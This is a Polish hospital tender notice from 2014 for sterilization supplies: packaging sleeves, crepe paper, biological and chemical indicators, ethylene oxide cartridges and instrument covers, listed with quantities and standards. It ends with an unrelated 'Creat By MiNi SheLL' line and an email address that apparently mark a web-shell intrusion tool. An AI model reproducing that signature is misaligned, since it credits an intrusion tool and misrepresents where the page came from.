Oferowany przedmiot zamówienia musi być dopuszczony do obrotu i do używania zgodnie z ustawą o wyrobach medycznych z dnia 20 maja 2010 r. (Dz. U. Nr 107, poz. 679 ze zm.)	
II.  Dokument na potwierdzenie spełnienia wymagań: 
1. Deklaracja zgodności CE, chyba że ustawa o wyrobach medycznych stanowi inaczej;
2. Dokument potwierdzający dokonanie odpowiednio : zgłoszenia lub powiadomienia o wprowadzeniu wyrobu medycznego do obrotu, chyba że ustawa o wyrobach medycznych stanowi inaczej; 
3. Dokument potwierdzający przeprowadzenie procedury oceny zgodności wyrobu medycznego z wymaganiami zasadniczymi (certyfikat zgodności wydany przez jednostkę notyfikowaną, uczestniczącą w ocenie zgodności), chyba że ustawa o wyrobach medycznych stanowi inaczej.

W przypadku gdy ustawa o wyrobach medycznych stanowi inaczej i dopuszcza inne dokumenty, niż wymienione w pkt 1-3 powyżej, Wykonawca zobowiązany jest złożyć dokument równoważny dokumentowi wymaganemu w siwz, zgodnie z ustawą o wyrobach medycznych.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawcy składający ofertę wspólnie, na podstawie art. 23 ustawy Prawo zamówień publicznych (dotyczy m.in. spółki cywilnej i tzw. konsorcjum), zobowiązani są, poza dokumentami wymienionymi wyżej, do złożenia dokumentu ustanawiającego pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wymagania zawarte w niniejszej specyfikacji dotyczące wykonawcy w zakresie obowiązku złożenia stosownych oświadczeń i dokumentów stosuje się odpowiednio do wszystkich wykonawców składających ofertę wspólnie. Jeżeli oferta wykonawców, składających ofertę wspólnie zostanie wybrana, zamawiający może przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców. 
2. Pisemne zobowiązanie innych podmiotów do udostępnienia określonych zasobów na zasadach określonych w art. 26 ust. 2 b uPzp - dotyczy, gdy Wykonawca korzysta z powyższej możliwości. 
3.Wszystkie dokumenty muszą być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez osobę uprawnioną do podpisania oferty. Nie dotyczy zobowiązania podmiotu trzeciego i pełnomocnictwa.
4. Pełnomocnictwo do reprezentowania Wykonawcy (o ile nie wynika z dokumentów rejestracyjnych) w przypadku podpisywania oferty przez osobę nie wpisaną do dokumentów rejestracyjnych. Pełnomocnictwo należy złożyć w oryginale lub w formie kopii poświadczonej za zgodność przez notariusza.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Strony przewidują możliwość istotnych zmian umowy w stosunku do treści oferty w przypadku,  gdy:
a/  nastąpi obniżenie ceny;
b/  nastąpi zmiana stawki podatku VAT - Zamawiający dopuszcza możliwość wzrostu cen jednostkowych brutto w przypadku zmiany stawki podatku od towarów i usług VAT. Zmiana cen brutto związana ze zmianą stawki podatku VAT może nastąpić najwcześniej z dniem wejścia w życie aktu prawnego wprowadzającego zmianę stawki podatku VAT, z uwzględnieniem obowiązujących regulacji;
c/  nastąpią zmiany osób wskazanych przez strony do realizacji umowy;
d/ nastąpi zmiana numeru katalogowego nie powodująca zmiany przedmiotu umowy lub  
      w przypadku, gdy numer katalogowy nie jest stosowany zmianie ulegnie symbol, bądź  
      skrót pozwalający na jednoznaczną identyfikację danego produktu.
e/ zmiany terminu obowiązywania umowy, zgodnie z § 5 ust. 3 umowy. 
2. Zamawiający dopuszcza także w szczególnych sytuacjach i za jego pisemną zgodą w trakcie trwania umowy zmianę przedmiotu umowy dostarczanego przez Wykonawcę, w szczególności w sytuacji gdy zaprzestano lub zawieszono produkcję danego towaru objętego umową, na inny towar o parametrach nie gorszych niż opisane w SIWZ, przy czym cena tego towaru zamiennego nie może przekraczać ceny towaru, na który została podpisana umowa. W przypadku zaprzestania lub zawieszenia produkcji towaru objętego umową Wykonawca winien udokumentować ten fakt.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.wloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Specjalistyczny
im. błogosławionego księdza Jerzego Popiełuszki we Włocławku
ul. Wieniecka 49, 87-800 Włocławek, budynek administracji, pok. 304.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.10.2014 godzina 10:00, miejsce: Wojewódzki Szpital Specjalistyczny
im. błogosławionego księdza Jerzego Popiełuszki we Włocławku
ul. Wieniecka 49, 87-800 Włocławek, budynek administracji, pok. 304.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1 
L.p.	Nazwa produktu	J.m.	 Ilość sztuk na 24 miesiące
1.	Rękaw papierowo-foliowy 50mm x 200m	rolka	55
2.	Rękaw papierowo - foliowy 75mm x 200m	rolka	96
3.	Rękaw papierowo - foliowy 100 mm x 200m	rolka	140
4.	Rękaw papierowo - foliowy 120 mm x 200m	rolka	160
5.	Rękaw papierowo - foliowy  150mm x 200m	rolka	55
6.	Rękaw papierowo - foliowy 200mm x 200m	rolka	100
7.	Rękaw papierowo - foliowy 250 mm x 200m	rolka	55
8.	Rękaw papierowo -foliowy 300mm x 200m	rolka	32
9.	Rękaw papierowo- foliowy z zakładką  
300mm x 80mm x 100m	rolka	50

WYMAGANIE dot. zadania nr 1: 

Rękawy papierowo-foliowe - pozycja od 1- 9 
Opakowanie sterylizacyjne zgodne z międzynarodowymi aktami prawnymi PN-EN ISO 11 607:2006 i  z zapisami Dyrektywy 93/42/EEC:o wyrobach medycznych.  
Znak CE umieszczony na opakowaniu zbiorczym zgodnie z ustawą z dnia 20 maja 2010 r. o wyrobach medycznych ( Dz.u. nr 107, poz. 679 ).
Papier o gramaturze 60-70g/m2.zgodny z normą PN EN 868-3:2001 ;Materiały i systemy opakowaniowe przeznaczone dla wyrobów medycznych przeznaczonych do sterylizacji papier stosowany do wytwarzania torebek papierowych i do wytwarzania torebek i rękawów. Wymagania i metody badań;  
Folia z testem do sterylizacji parowej i tlenkiem etylenu co najmniej pięciowarstwowa nie licząc warstwy kleju, ocena parametrów wytrzymałościowych wydana przez producenta folii (a nie dystrybutora) zgodna z normami  PN EN 868-5:2001;Materiały i systemy opakowaniowe przeznaczone dla wyrobów medycznych, przeznaczonych do sterylizacji. Torebki zgrzewalne i z zamknięciem samoprzylepnym oraz rękawy papierowo-foliowe. Wymagania i metody badań.: 
Wszystkie napisy i testy poza przestrzenią roboczą, dopuszcza się wskaźniki wzdłuż zgrzewu.
Jednoznacznie oznaczony kierunek otwierania wyłącznie od strony papieru na linii zgrzewu fabrycznego.
Rękawy ze względów techniczno-higienicznych nawinięte na rolkę folią na zewnątrz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2
Lp.	Nazwa produktu	J.m.	 Ilość arkuszy
 na 24 miesiące
1.	Papier krepowany biały/zielony 
600mm x 600mm	1 arkusz	12500
2.	Papier krepowany biały/zielony 750 x 750mm	1 arkusz	8500
3.	Papier krepowany biały/zielony 
1000 x 1000mm	1 arkusz	23750
4.	Włóknina zielona                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1000x1000mm	1 arkusz	14500
5.	Maty absorpcyjne do wykładania tac narzędziowych 750 x 750mm	1 arkusz	1100

WYMAGANIE dot. zadania nr 2: 

Papier sterylizacyjny - pozycja 1-3 
Opakowanie sterylizacyjne zgodne z międzynarodowymi aktami prawnymi PN-EN ISO 11 607:2006 i  z zapisami Dyrektywy 93/42/EEC o: wyrobach medycznych.
Charakterystyka wytrzymałościowa wydana przez producenta papieru sterylizacyjnego w celu potwierdzenia i oceny parametrów wytrzymałościowych, gramatury nominalnej papieru 60 g/m2  przy niskiej zawartości chlorków i siarczanów nie więcej niż 0,02%.
Zgodny z normą PN EN 868-2.: Materiały i systemy opakowaniowe przeznaczone dla wyrobów medycznych przeznaczonych do sterylizacji. Wymagania i metody badań.;
Włókno celulozowe, kolor zielony i biały.
Włóknina sterylizacyjna - pozycja 4 
Opakowanie sterylizacyjne zgodne z międzynarodowymi aktami prawnymi PN-EN ISO 11 607:2006 i  z zapisami Dyrektywy 93/42/EEC o: wyrobach medycznych.
Charakterystyka wytrzymałościowa wydana przez producenta w celu potwierdzenia i oceny parametrów wytrzymałościowych o gramaturze nominalnej 66 g/m2 ? 5% zawartości chlorków i siarczanów nie więcej niż 0,01 %,
Zgodność z normą PN EN 868-2. .: Materiały i systemy opakowaniowe przeznaczone dla wyrobów medycznych przeznaczonych do sterylizacji. Wymagania i metody badań.;
Włóknina sterylizacyjna III generacji - celuloza wiązana powierzchniowo wzmocniona włóknem syntetycznym, mikrokrepowana, uszczelniona lateksem.
Mata absorpcyjna - pozycja 5
Opakowanie sterylizacyjne zgodne z międzynarodowymi aktami prawnymi PN-EN ISO 11 607:2006 i  z zapisami Dyrektywy 93/42/EEC o: wyrobach medycznych.
Papier medyczny z warstwą absorpcyjną do stosowania pod tacę narzędziową celem osłonięcia ostrych krawędzi i zapewnienia szybkiego pochłaniania wilgoci podczas parowych cykli sterylizacji do jednorazowego użytku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.77.20.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3
Lp.	Nazwa towaru	J.m.	Ilość opakowań
 na 24 miesiące
1.	Wskaźnik biologiczny fiolkowy do tlenku etylenu	1op./100fiolek.	8
2.	Fiolkowe wskaźniki biologiczne o szybkim odczycie do pary wodnej 	1op./100fiolek	13

WYMAGANIE dot. zadania nr 3: 

Wskaźnik biologiczny fiolkowy do tlenku etylenu - pozycja 1
Odpowiadający normie PN EN ISO11138-2: 2011P Sterylizacja produktów stosowanych w  ochronie zdrowia Wskaźniki biologiczne dla procesów sterylizacji tlenkiem etylenu
Ostateczny odczyt wskaźnika po 48 godzinach inkubacji.
Fiolkowe wskaźniki biologiczne o szybkim odczycie do pary wodnej - pozycja 2 
Odpowiadające normie PN EN ISO 11138-1:2008P Sterylizacja produktów stosowanych w ochronie zdrowia. Wymagania ogólne.
Kompatybilne z inkubatorem marki Terragene.
Ostateczny odczyt wskaźnika biologicznego po 3h.
Etykieta na fiolce wskaźnika biologicznego podczas procesu sterylizacji powinna w widoczny sposób zmienić zabarwienie.
Naklejka nierwąca, przylepna co umożliwia umieszczenie jej w dokumentacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 4 
Lp.	Nazwa towaru	J.m.	Ilość
 na 24 miesiące
1.	Wskaźnik wieloparametrowy do tlenku etylenu odpowiadający klasie 4 	
1op./500szt.	70
2.	Wskaźnik wieloparametrowy do pary klasy 4	
1op./500szt.	65
3.	Wskaźnik kontroli procesu odpowiadający klasie 6 lub 5 do pary z przyrządem testowym procesu sterylizacji PCD 	1op./ 250szt.	23
4.	Jednorazowy pakiet typu Bovie - Dick	Pakiet 1 szt.	1900
5.	Taśma testowa wskaźnikowa do pary szer.19x50  mb.	1rolka 50 m	650
6	Taśma neutralna szer.19 mm	1 rolka 50 m	760

WYMAGANIE dot. zadania nr 4: 

Wieloparametrowy wskaźnik do tlenku etylenu klasy 4 - pozycja  1
Odpowiada normie PN EN ISO 11140 -1: 2011P.Sterylizacja produktów stosowanych w ochronie zdrowia. Wskaźniki chemiczne wymagania ogólne.
Nietoksyczny, nie zawiera ołowiu i substancji szkodliwych.
Podwójny pasek testowy z równolegle rozłożoną substancją wskaźnikową, w widoczny sposób zmieniający barwę podczas procesu sterylizacji. 
Wieloparametrowy wskaźnik do pary klasy 4 - pozycja 2 
Odpowiada normie PN EN ISO 11140 -1: 2011P. .Sterylizacja produktów stosowanych w ochronie zdrowia. Wskaźniki chemiczne wymagania ogólne.
Nietoksyczny, nie zawiera ołowiu i substancji szkodliwych. 
Podwójny pasek testowy z równolegle rozłożoną substancją wskaźnikową na środku
perforowany w widoczny sposób zmieniający barwę podczas procesu sterylizacji. 
Wskaźnik kontroli procesu sterylizacji parowej z przyrządem procesu sterylizacji PCD - pozycja 3 
Test wsadu składający się z przyrządu testowego procesu sterylizacji i przystosowanych do niego testów klasy 6 lub 5. Testy chemiczne odpowiadające normie PN EN ISO 11140-1:2011P Sterylizacja produktów stosowanych w ochronie zdrowia. Wskaźniki chemiczne wymagania ogólne. Kontrola sterylizacji parą wodną w autoklawach próżniowych w cyklu 134oC/7min i 121oC/20min.  
Symuluje niekorzystne warunki sterylizacji, aby dokładnie kontrolować penetrację pary oraz zachowanie wszystkich parametrów danego cyklu,  w najtrudniej dostępnych miejscach sterylizowanego wsadu.
Testy podczas procesu sterylizacji  w widoczny sposób zmieniające barwę, nietoksyczne, bez zawartości ołowiu i substancji szkodliwych.
Przyrząd PCD kompatybilny z testem klasy 6 lub 5. 
Jednorazowy pakiet Bovie-Dick - pozycja 4
Kontroluje penetrację i jakość pary, symulując ładunek porowaty.
Potwierdzenie zgodności normą PN EN ISO 11140-3: 2011P. Sterylizacja produktów stosowanych w ochronie zdrowia. Wskaźniki chemiczne. Systemy wskaźnikowe Klasy 2 do stosowania w teście penetracji pary wodnej typu Boviego -.Dicka.
Pakiet jednorazowy nietoksyczny w widoczny sposób zmieniający barwę podczas procesu sterylizacji.
Cykl  Bovie-Dicka w zakresie 1340C /3,5 min i 1210C/15 min.
Taśma wskaźnikowa  - pozycja 5  
Taśma ze wskaźnikiem do sterylizacji parą wodną  wymagana charakterystyka producenta.
Taśma neutralna - pozycja 6
Taśma maskująca, zabezpieczająca zestawy narzędzi przed otwarciem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 5
Lp.	Nazwa produktu	J.m.	 Ilość 
 na 24 miesiące
1.	Etykiety podwójnieprzylepne bez wskaźnika procesu z miejscami informacyjnymi do metkownicy BLITZ	rol.	1050
2.	Koperty dokumentacyjne przystosowane do etykiet	szt.	660
3.	Rolka zapasowa z tuszem do metkownicy BLITZ	szt.	14

WYMAGANIE dot. zadania nr 5 : 
Etykiety podwójnie przylepne - pozycja 1
Przeznaczone do oznaczania pakietów po procesie sterylizacji.
Napisy w języku polskim. 	
Podwójnie przylepne.
Etykiety pozbawione testu procesu sterylizacji.
Pięć pól zapisywania do trzyrzędowej metkownicy BLITZ.
Koperty dokumentacyjne - pozycja 2
Koperty drukowane jednodniowe w języku polskim z przygotowanymi do wypełnienia polami zawierającymi najistotniejsze dla dokumentacji informacje oraz miejscami do wklejania etykiet.
Rolki zapasowe z tuszem - pozycja 3
Zapasowa rolka z tuszem do metkownicy BLITZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.77.20.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 6
Lp.	Nazwa produktu	J.m.	Ilość sztuk
na 24 miesiące
1.	Naboje do aparatu STERI-VAC  5XLP	 szt.	732

WYMAGANIE dot. zadania nr 6 : 

Naboje do aparatu STERI-VAC 5XLP - pozycja 1
Naboje zawierające 100g czystego tlenku etylenu opiniowane i dopuszczone do użytku z gwarancją efektywności bakteriobójczej, kompatybilne z aparatem STERI-VAC 5XLP..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 7
Lp.	Nazwa produktu	J.m.	Ilość sztuk
 na 24 miesiące
1.	Osłonki na igły	szt.	1200

WYMAGANIE dot. zadania nr 7 : 

Osłonki na igły - pozycja 1
Zabezpieczenie ostrych delikatnych narzędzi igieł sond, wkłuć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.77.20.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 8
Lp.	Nazwa produktu	J.m.	Ilość sztuk
 na 24 miesiące
1.	Przeźroczyste osłonki na ostrza szer. 15mm	szt.	3600
2.	Przeźroczyste osłonki na ostrza szer.30mm	szt.	3600

WYMAGANIE dot. zadania nr 8 : 

Przeźroczyste osłonki na ostrza - pozycja 1 i 2
Zabezpieczenie końcówek i ostrzy narzędzi z możliwością wizualnej identyfikacji poprzez przeźroczystą osłonę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 19.52.11.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com